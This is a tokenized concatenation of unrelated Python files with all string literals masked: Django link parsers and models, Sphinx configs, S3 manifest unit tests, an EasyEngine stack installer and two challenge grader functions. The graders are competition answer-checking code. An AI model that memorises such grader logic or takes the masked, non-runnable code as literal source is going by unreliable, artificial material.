<EOL> name = [ v for k , v in attributes if k == '<STR_LIT:name>' ] <EOL> if name : <EOL> self . names . append ( name [ <NUM_LIT:0> ] ) <EOL> def parse ( obj , field , parser ) : <EOL> html = getattr ( obj , field ) <EOL> if html : <EOL> parser . feed ( html ) <EOL> parser . close ( ) <EOL> return parser . urls <EOL> else : <EOL> return [ ] <EOL> def parse_urls ( obj , field ) : <EOL> parser = URLLister ( ) <EOL> return parse ( obj , field , parser ) <EOL> def parse_images ( obj , field ) : <EOL> parser = ImageLister ( ) <EOL> return parse ( obj , field , parser ) <EOL> def parse_anchors ( content ) : <EOL> parser = AnchorLister ( ) <EOL> parser . feed ( content ) <EOL> parser . close ( ) <EOL> return parser . names <EOL> class Linklist ( object ) : <EOL> html_fields = [ ] <EOL> url_fields = [ ] <EOL> ignore_empty = [ ] <EOL> image_fields = [ ] <EOL> object_filter = None <EOL> object_exclude = None <EOL> def __get ( self , name , obj , default = None ) : <EOL> try : <EOL> attr = getattr ( self , name ) <EOL> except AttributeError : <EOL> return default <EOL> if callable ( attr ) : <EOL> return attr ( obj ) <EOL> return attr <EOL> @ staticmethod <EOL> def extract_url_from_field ( obj , field_name ) : <EOL> val = getattr ( obj , field_name ) <EOL> try : <EOL> try : <EOL> url = val . url <EOL> except ValueError : <EOL> url = '<STR_LIT>' <EOL> except AttributeError : <EOL> url = val <EOL> return url or '<STR_LIT>' <EOL> def get_urls_from_field_list ( self , obj , field_list ) : <EOL> urls = [ ] <EOL> for field_name in field_list : <EOL> url = self . extract_url_from_field ( obj , field_name ) <EOL> if field_name in self . ignore_empty and not url : <EOL> continue <EOL> urls . append ( ( field_name , '<STR_LIT>' , url ) ) <EOL> return urls <EOL> def urls ( self , obj ) : <EOL> urls = [ ] <EOL> for field_name in self . html_fields : <EOL> urls += [ ( field_name , text , url ) for text , url in parse_urls ( obj , field_name ) ] <EOL> urls += self . get_urls_from_field_list ( obj , self . url_fields ) <EOL> return urls <EOL> def images ( self , obj ) : <EOL> urls = [ ] <EOL> for field_name in self . html_fields : <EOL> urls += [ ( field_name , text , url ) for text , url in parse_images ( obj , field_name ) ] <EOL> urls += self . get_urls_from_field_list ( obj , self . image_fields ) <EOL> return urls <EOL> @ classmethod <EOL> def objects ( cls ) : <EOL> objects = cls . model . objects . all ( ) <EOL> if cls . object_filter : <EOL> objects = objects . filter ( ** cls . object_filter ) . distinct ( ) <EOL> if cls . object_exclude : <EOL> objects = objects . exclude ( ** cls . object_exclude ) . distinct ( ) <EOL> return objects <EOL> def get_linklist ( self , extra_filter = None ) : <EOL> extra_filter = extra_filter or { } <EOL> linklist = [ ] <EOL> objects = self . objects ( ) <EOL> if extra_filter : <EOL> objects = objects . filter ( ** extra_filter ) <EOL> for obj in objects : <EOL> linklist . append ( { <EOL> '<STR_LIT:object>' : obj , <EOL> '<STR_LIT>' : self . urls ( obj ) , <EOL> '<STR_LIT>' : self . images ( obj ) , <EOL> } ) <EOL> return linklist <EOL> @ classmethod <EOL> def content_type ( cls ) : <EOL> from django . contrib . contenttypes . models import ContentType <EOL> return ContentType . objects . get_for_model ( cls . model ) </s>
<s> import sys <EOL> import os <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> autodoc_member_order = '<STR_LIT>' <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT:1.0>' <EOL> release = '<STR_LIT:1.0>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = "<STR_LIT:default>" <EOL> if not on_rtd : <EOL> import sphinx_rtd_theme <EOL> html_theme = "<STR_LIT>" <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> '''<STR_LIT>''' <EOL> import requests <EOL> import simplejson as json <EOL> USERDATA = '<STR_LIT>' <EOL> def retrieveUserData ( url ) : <EOL> '''<STR_LIT>''' <EOL> req = requests . get ( url ) <EOL> content = json . loads ( req . content ) <EOL> filteredData = [ ] <EOL> data = { } <EOL> data [ '<STR_LIT:name>' ] = content [ '<STR_LIT:name>' ] <EOL> data [ '<STR_LIT>' ] = content [ '<STR_LIT>' ] . upper ( ) <EOL> data [ '<STR_LIT>' ] = content [ '<STR_LIT>' ] <EOL> data [ '<STR_LIT:state>' ] = content [ '<STR_LIT:state>' ] <EOL> data [ '<STR_LIT:status>' ] = content [ '<STR_LIT:status>' ] <EOL> filteredData . append ( data ) <EOL> return filteredData </s>
<s> from django . db import models <EOL> from django . core . urlresolvers import reverse <EOL> from markitup . fields import MarkupField <EOL> from cardbox . deck_model import Deck <EOL> class Card ( models . Model ) : <EOL> ID = models . AutoField ( primary_key = True ) <EOL> deck = models . ForeignKey ( Deck ) <EOL> front = MarkupField ( ) <EOL> back = MarkupField ( ) <EOL> created = models . DateTimeField ( auto_now_add = True ) <EOL> def __unicode__ ( self ) : <EOL> return self . front . raw <EOL> def get_absolute_url ( self ) : <EOL> """<STR_LIT>""" <EOL> return reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . ID } ) </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> from django . conf import settings <EOL> settings . configure ( ) <EOL> settings . STATIC_URL = '<STR_LIT>' <EOL> settings . STATIC_ROOT = '<STR_LIT>' <EOL> settings . ANONYMOUS_USER_ID = '<STR_LIT>' <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> intersphinx_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> } <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> import sphinx_rtd_theme <EOL> html_theme = "<STR_LIT>" <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] </s>
<s> import os <EOL> def env ( name ) : <EOL> return os . environ . get ( name ) </s>
<s> import unittest <EOL> from boto . s3 . key import Key <EOL> from mock import Mock , patch , mock_open , create_autospec , call <EOL> from arbalest . redshift . manifest import SqlManifest <EOL> from arbalest . redshift . schema import Property , JsonObject <EOL> from arbalest . s3 import Bucket <EOL> from arbalest . sql import Database <EOL> from test import BUCKET_NAME , TABLE_NAME , AWS_ACCESS_KEY_ID , AWS_SECRET_ACCESS_KEY <EOL> class SqlManifestShould ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . schema = JsonObject ( TABLE_NAME , Property ( '<STR_LIT:id>' , '<STR_LIT>' ) ) <EOL> self . bucket = Bucket ( AWS_ACCESS_KEY_ID , AWS_SECRET_ACCESS_KEY , <EOL> BUCKET_NAME , Mock ( ) ) <EOL> self . bucket . save = Mock ( ) <EOL> self . database = create_autospec ( Database ) <EOL> self . key_names = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . bucket . list = Mock ( <EOL> return_value = [ self . mock_key ( key ) for key in self . key_names ] ) <EOL> self . manifest = SqlManifest ( metadata = '<STR_LIT>' , <EOL> source = '<STR_LIT>' , <EOL> schema = self . schema , <EOL> bucket = self . bucket , <EOL> db_connection = self . database ) <EOL> self . expected_manifest = { '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , '<STR_LIT>' : True } <EOL> ] } <EOL> def mock_key ( self , name ) : <EOL> return Key ( Mock ( ) , name ) <EOL> def mock_key_exists ( self , key_name , exists ) : <EOL> key = self . mock_key ( key_name ) <EOL> key . exists = Mock ( return_value = exists ) <EOL> key . get_contents_to_filename = Mock ( ) <EOL> self . bucket . get = Mock ( return_value = key ) <EOL> return key <EOL> def mock_journal ( self , exists , key_names = None ) : <EOL> self . mock_key_exists ( self . manifest . journal_key , exists ) <EOL> if exists : <EOL> self . database . fetchall = Mock ( <EOL> return_value = ( ( key , ) for key in key_names ) ) <EOL> def test_have_all_keys ( self ) : <EOL> self . assertEqual ( self . key_names , list ( self . manifest . all_keys ) ) <EOL> def test_have_manifest_key ( self ) : <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> self . manifest . manifest_key ) <EOL> def test_have_journal_key ( self ) : <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> self . manifest . journal_key ) <EOL> def test_have_manifest_url ( self ) : <EOL> self . assertEqual ( <EOL> '<STR_LIT>' . format ( BUCKET_NAME ) , <EOL> self . manifest . manifest_url ) <EOL> def test_have_empty_journal ( self ) : <EOL> self . mock_journal ( False ) <EOL> self . assertEqual ( [ ] , list ( self . manifest . journal ( ) ) ) <EOL> self . database . open . assert_called_once_with ( ) <EOL> sql = '<STR_LIT>' <EOL> self . database . execute . assert_called_once_with ( sql ) <EOL> self . database . commit . assert_called_once_with ( ) <EOL> self . database . close . assert_called_once_with ( ) <EOL> def test_have_journal ( self ) : <EOL> self . mock_journal ( True , self . key_names ) <EOL> self . assertEqual ( self . key_names , list ( self . manifest . journal ( ) ) ) <EOL> self . database . open . assert_called_once_with ( ) <EOL> sql = '<STR_LIT>' <EOL> self . database . execute . assert_called_once_with ( sql ) <EOL> def test_have_manifest_when_journal_is_empty ( self ) : <EOL> self . mock_journal ( False ) <EOL> expected_entries = set ( <EOL> [ entry [ '<STR_LIT:url>' ] for entry in <EOL> self . expected_manifest [ '<STR_LIT>' ] ] ) <EOL> actual_entries = set ( <EOL> [ entry [ '<STR_LIT:url>' ] for entry in <EOL> self . manifest . get ( ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] ] ) <EOL> self . assertEqual ( expected_entries , actual_entries ) <EOL> def test_update_existing_manifest_when_key_not_in_journal ( self ) : <EOL> self . mock_journal ( True , list ( self . key_names ) ) <EOL> self . key_names . append ( <EOL> '<STR_LIT>' ) <EOL> self . bucket . list = Mock ( <EOL> return_value = [ self . mock_key ( key ) for key in self . key_names ] ) <EOL> self . assertEqual ( [ { <EOL> '<STR_LIT:url>' : '<STR_LIT>' . format ( <EOL> BUCKET_NAME ) , <EOL> '<STR_LIT>' : True } ] , <EOL> list ( self . manifest . get ( ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) ) <EOL> def test_save ( self ) : <EOL> f = mock_open ( ) <EOL> self . mock_journal ( False ) <EOL> key = self . mock_key ( self . manifest . manifest_key ) <EOL> key . set_contents_from_filename = Mock ( ) <EOL> key . get_contents_to_filename = Mock ( ) <EOL> self . bucket . get = Mock ( return_value = key ) <EOL> with patch ( '<STR_LIT>' , f , create = True ) : <EOL> self . manifest . save ( ) <EOL> f . assert_called_once_with ( self . manifest . file_name , '<STR_LIT:wb>' ) <EOL> handle = f ( ) <EOL> self . assertEqual ( call ( <NUM_LIT:0> ) , handle . seek . call_args_list [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , handle . truncate . call_count ) <EOL> self . assertEqual ( [ call ( '<STR_LIT>' ) , <EOL> call ( '<STR_LIT>' ) , <EOL> call ( <EOL> '<STR_LIT>' ) , <EOL> call ( <EOL> '<STR_LIT>' ) , <EOL> call ( <EOL> '<STR_LIT>' ) , <EOL> call ( <EOL> '<STR_LIT>' ) , <EOL> call ( <EOL> '<STR_LIT>' ) , <EOL> call ( <EOL> '<STR_LIT>' ) , <EOL> call ( <EOL> '<STR_LIT>' ) , <EOL> call ( <EOL> '<STR_LIT>' ) , <EOL> call ( <EOL> '<STR_LIT>' ) , <EOL> call ( '<STR_LIT>' ) ] , handle . write . call_args_list ) <EOL> key . set_contents_from_filename . assert_called_once_with ( <EOL> self . manifest . file_name ) <EOL> def test_commit ( self ) : <EOL> key = self . mock_key ( self . manifest . journal_key ) <EOL> key . set_contents_from_filename = Mock ( ) <EOL> self . bucket . get = Mock ( return_value = key ) <EOL> self . manifest . commit ( self . key_names ) <EOL> self . database . open . assert_called_once_with ( ) <EOL> inserts = [ call ( '<STR_LIT>' ) , <EOL> call ( '<STR_LIT>' , <EOL> ( <EOL> '<STR_LIT>' , ) ) , <EOL> call ( '<STR_LIT>' , <EOL> ( <EOL> '<STR_LIT>' , ) ) , <EOL> call ( '<STR_LIT>' , <EOL> ( <EOL> '<STR_LIT>' , ) ) , <EOL> call ( '<STR_LIT>' , <EOL> ( <EOL> '<STR_LIT>' , ) ) , <EOL> call ( '<STR_LIT>' , <EOL> ( <EOL> '<STR_LIT>' , ) ) , <EOL> call ( '<STR_LIT>' , <EOL> ( <EOL> '<STR_LIT>' , ) ) , <EOL> call ( '<STR_LIT>' , <EOL> ( <EOL> '<STR_LIT>' , ) ) , <EOL> call ( '<STR_LIT>' , <EOL> ( <EOL> '<STR_LIT>' , ) ) ] <EOL> self . database . execute . assert_has_calls ( inserts ) <EOL> self . database . commit . assert_called_once_with ( ) <EOL> self . database . close . assert_called_once_with ( ) <EOL> key . set_contents_from_filename . assert_called_once_with ( <EOL> self . manifest . journal_file_name ) <EOL> def test_exist ( self ) : <EOL> exists = True <EOL> self . mock_key_exists ( self . manifest . manifest_key , exists ) <EOL> self . assertEqual ( exists , self . manifest . exists ( ) ) <EOL> def test_not_exist ( self ) : <EOL> exists = False <EOL> self . mock_key_exists ( self . manifest . manifest_key , exists ) <EOL> self . assertEqual ( exists , self . manifest . exists ( ) ) <EOL> def test_have_journal_existence ( self ) : <EOL> exists = True <EOL> self . mock_key_exists ( self . manifest . journal_key , exists ) <EOL> self . assertEqual ( exists , self . manifest . journal_exists ( ) ) <EOL> def test_not_have_journal_existence ( self ) : <EOL> exists = False <EOL> self . mock_key_exists ( self . manifest . journal_key , exists ) <EOL> self . assertEqual ( exists , self . manifest . journal_exists ( ) ) </s>
<s> import api <EOL> import re <EOL> from voluptuous import Required , Length , Schema , Invalid , MultipleInvalid <EOL> from api . exceptions import * <EOL> def check ( * callback_tuples ) : <EOL> def v ( value ) : <EOL> for callbacks , msg in callback_tuples : <EOL> for callback in callbacks : <EOL> try : <EOL> result = callback ( value ) <EOL> if not result and type ( result ) == bool : <EOL> raise Invalid ( msg ) <EOL> except Exception : <EOL> raise WebException ( msg ) <EOL> return value <EOL> return v <EOL> def verify_to_schema ( schema , data ) : <EOL> try : <EOL> schema ( data ) <EOL> except MultipleInvalid as error : <EOL> raise APIException ( error ) </s>
<s> def grade ( tid , answer ) : <EOL> if answer . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> return { "<STR_LIT>" : False , "<STR_LIT:message>" : "<STR_LIT>" } <EOL> elif answer . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> return { "<STR_LIT>" : True , "<STR_LIT:message>" : "<STR_LIT>" } <EOL> return { "<STR_LIT>" : False , "<STR_LIT:message>" : "<STR_LIT>" } </s>
<s> def grade ( tid , answer ) : <EOL> if answer . find ( "<STR_LIT>" ) != - <NUM_LIT:1> : <EOL> return { "<STR_LIT>" : True , "<STR_LIT:message>" : "<STR_LIT>" } <EOL> return { "<STR_LIT>" : False , "<STR_LIT:message>" : "<STR_LIT>" } </s>
<s> import math <EOL> import os <EOL> import random <EOL> import imp <EOL> common = imp . load_source ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def insert ( original , new , pos ) : <EOL> return original [ : pos ] + str ( new ) + original [ pos : ] <EOL> def generate ( full_path ) : <EOL> try : <EOL> chosen = random . sample ( set ( common . strings ) , <NUM_LIT:10> ) <EOL> changed = chosen <EOL> orig = chosen <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> output = chosen [ i ] + "<STR_LIT:\n>" <EOL> f = open ( full_path + os . sep + "<STR_LIT:test>" + str ( i ) + "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> f . write ( "<STR_LIT:%s>" % output ) <EOL> f . close ( ) <EOL> for b in range ( <NUM_LIT:20> ) : <EOL> changed [ i ] = insert ( changed [ i ] , random . randint ( <NUM_LIT:0> , <NUM_LIT:9> ) , random . randint ( <NUM_LIT:0> , len ( changed [ i ] ) - <NUM_LIT:1> ) ) <EOL> name = changed [ i ] <EOL> f = open ( full_path + os . sep + "<STR_LIT:test>" + str ( i ) + "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> f . write ( "<STR_LIT>" % name ) <EOL> f . close ( ) <EOL> return <NUM_LIT:1> <EOL> except : <EOL> return <NUM_LIT:0> </s>
<s> """<STR_LIT>""" <EOL> from cement . core . controller import CementBaseController , expose <EOL> from cement . core import handler , hook <EOL> from ee . cli . plugins . site_functions import * <EOL> from ee . core . variables import EEVariables <EOL> from ee . core . aptget import EEAptGet <EOL> from ee . core . download import EEDownload <EOL> from ee . core . shellexec import EEShellExec , CommandExecutionError <EOL> from ee . core . fileutils import EEFileUtils <EOL> from ee . core . apt_repo import EERepo <EOL> from ee . core . extract import EEExtract <EOL> from ee . core . mysql import EEMysql <EOL> from ee . core . addswap import EESwap <EOL> from ee . core . git import EEGit <EOL> from ee . core . checkfqdn import check_fqdn <EOL> from pynginxconfig import NginxConfig <EOL> from ee . core . services import EEService <EOL> from ee . core . variables import EEVariables <EOL> import random <EOL> import string <EOL> import configparser <EOL> import time <EOL> import shutil <EOL> import os <EOL> import pwd <EOL> import grp <EOL> import codecs <EOL> import platform <EOL> from ee . cli . plugins . stack_services import EEStackStatusController <EOL> from ee . cli . plugins . stack_migrate import EEStackMigrateController <EOL> from ee . cli . plugins . stack_upgrade import EEStackUpgradeController <EOL> from ee . core . logging import Log <EOL> from ee . cli . plugins . sitedb import * <EOL> def ee_stack_hook ( app ) : <EOL> pass <EOL> class EEStackController ( CementBaseController ) : <EOL> class Meta : <EOL> label = '<STR_LIT>' <EOL> stacked_on = '<STR_LIT>' <EOL> stacked_type = '<STR_LIT>' <EOL> description = '<STR_LIT>' <EOL> arguments = [ <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ] <EOL> usage = "<STR_LIT>" <EOL> @ expose ( hide = True ) <EOL> def default ( self ) : <EOL> """<STR_LIT>""" <EOL> self . app . args . print_help ( ) <EOL> @ expose ( hide = True ) <EOL> def pre_pref ( self , apt_packages ) : <EOL> """<STR_LIT>""" <EOL> if set ( EEVariables . ee_postfix ) . issubset ( set ( apt_packages ) ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if set ( EEVariables . ee_mysql ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> mysql_pref = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> with open ( '<STR_LIT>' <EOL> '<STR_LIT>' , '<STR_LIT:w>' ) as mysql_pref_file : <EOL> mysql_pref_file . write ( mysql_pref ) <EOL> EERepo . add ( self , repo_url = EEVariables . ee_mysql_repo ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_mysql_repo ) ) <EOL> EERepo . add_key ( self , '<STR_LIT>' , <EOL> keyserver = "<STR_LIT>" ) <EOL> chars = '<STR_LIT>' . join ( random . sample ( string . ascii_letters , <NUM_LIT:8> ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( chars = chars ) , <EOL> log = False ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( chars = chars ) , <EOL> log = False ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( "<STR_LIT>" ) <EOL> mysql_config = """<STR_LIT>""" . format ( chars = chars ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read_string ( mysql_config ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> conf_path = "<STR_LIT>" <EOL> os . makedirs ( os . path . dirname ( conf_path ) , exist_ok = True ) <EOL> with open ( conf_path , encoding = '<STR_LIT:utf-8>' , <EOL> mode = '<STR_LIT:w>' ) as configfile : <EOL> config . write ( configfile ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EEFileUtils . chmod ( self , "<STR_LIT>" , <NUM_LIT> ) <EOL> if set ( EEVariables . ee_nginx ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EERepo . add ( self , repo_url = EEVariables . ee_nginx_repo ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add_key ( self , EEVariables . ee_nginx_key ) <EOL> if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EERepo . add ( self , repo_url = EEVariables . ee_nginx_dev_repo ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add_key ( self , EEVariables . ee_nginx_key ) <EOL> if EEVariables . ee_platform_codename != '<STR_LIT>' : <EOL> if set ( EEVariables . ee_php ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if EEVariables . ee_platform_distro == '<STR_LIT>' : <EOL> if EEVariables . ee_platform_codename != '<STR_LIT>' : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , repo_url = EEVariables . ee_php_repo ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add_key ( self , '<STR_LIT>' ) <EOL> else : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , ppa = EEVariables . ee_php_repo ) <EOL> else : <EOL> if set ( EEVariables . ee_php7_0 ) . issubset ( set ( apt_packages ) ) or set ( EEVariables . ee_php5_6 ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , ppa = EEVariables . ee_php_repo ) <EOL> if set ( EEVariables . ee_hhvm ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , ppa = EEVariables . ee_boost_repo ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , repo_url = EEVariables . ee_hhvm_repo ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add_key ( self , '<STR_LIT>' ) <EOL> if set ( EEVariables . ee_mail ) . issubset ( set ( apt_packages ) ) : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( "<STR_LIT>" ) <EOL> if set ( EEVariables . ee_redis ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if EEVariables . ee_platform_distro == '<STR_LIT>' : 